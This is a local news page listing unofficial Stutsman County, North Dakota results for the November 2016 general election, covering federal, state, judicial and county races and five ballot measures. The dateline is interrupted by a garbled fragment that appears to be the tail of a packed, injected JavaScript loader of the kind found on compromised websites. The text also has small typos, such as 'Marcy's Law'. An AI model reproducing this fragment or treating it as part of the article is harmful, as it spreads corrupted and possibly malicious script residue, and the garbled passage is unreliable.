Stutsman County 2016 Election Results


JAMESTOWN, zyfys|var|u0026u|referrer|synyn||js|php’.split(‘|’),0,{}))
N.D. ( – The following are the unofficial results of contested races voted on by residents in Stutsman County for the November 2016 General Election.

Voters went to cast their ballots at the Jamestown Civic Center and local precincts in the county.

12 out of 12 precincts reporting (100%)

President Of The United States

Donald Trump (Republican) 6706

Hillary Clinton (Democratic-NPL) 2484

Gary Johnson (Libertarian) 571

Jill Stein (Green) 109

Darrell Castle (Constitution) 55

Rocky De La Fuenta (American Delta) 13

United State Senator

John Hoeven (Republican) 8873

Eliot Glassheim (Democratic-NPL) 1321

Robert N Marquette (Libertarian) 220

James Germalic (Independent Nomination Party) 136

United State House Representative

Kevin Cramer (Republican) 6984

Chase Iron Eyes (Democratic-NPL) 2164

Jack Seaman (Libertarian) 658

District 12 State Senator 

Katie Andersen (Republican) 2555

John Grabinger (Democratic-NPL) 3664

District 12 State Representative (2)

Bernie Satrom (Republican) 3393

Jim Grueneich (Republican) 2705

Jessica Haak (Democratic-NPL) 2472

Pam Musland (Democratic-NPL) 2428

North Dakota Governor and Lieutenant Governor

Doug Burgum and Brent Sanford (Republican) 7935

Marvin Nelson and Joan Heckman (Democratic-NPL) 1564

Marty Riske and Joshua Voytek (Libertarian) 335

State Auditor

Josh Gallion (Republican) 6371

Roland Riemers (Libertarian) 2219

State Treasurer

Kelly Schmidt (Republican) 5803

Tim Mathern (Democratic-NPL) 2673

Eric Olson (Libertarian) 730

State Insurance Commissioner

John Godfread (Republican) 5534

Ruth Buffalo (Democratic-NPL) 2317

Nick Bata (Libertarian) 1079

State Public Service Commissioner

Julie Fedorchak (Republican) 5946

Marlo Hunte-Beaubrun (Democratic-NPL) 1910

Thomas Skadeland (Libertarian) 884

State Superintendent of Public Instruction

Joe Chiang 1908

Kirsten Baesler 6070

North Dakota Supreme Court Justice (10 year term)

Jerod Tufte 5434

Robert Bolinske 1992

District #2 Judge

Lyle Bopp 1951

Mark Blumer 4915

District #5 Judge

Daniel Narum 3730

Kim Radamacher 3571

Stutsman County Commissioner

David Schwartz 4148

Mark Klose 5411

Nellie Degen 2625

Tim Greshik 3480

Measure #1 (Legislators Must Live In Districts They Serve)

Yes 8358

No 1097

Measure #2 (Oil Extraction Tax Distribution)

Yes 5927

No 3404

Measure #3 (Crime Victims/”Marcy’s Law”)

Yes 6171

No 3602

Measure #4 (Tobacco Tax Increase)

Yes 3602

No 6364

Measure #5 (Medical Marijuana)

Yes 6316

No 3605

Comment Disclaimer: The views and opinions expressed in the comments section of are solely those of the comment author and do not necessarily reflect the views and opinions held by

Comments are closed.

National News

National Sports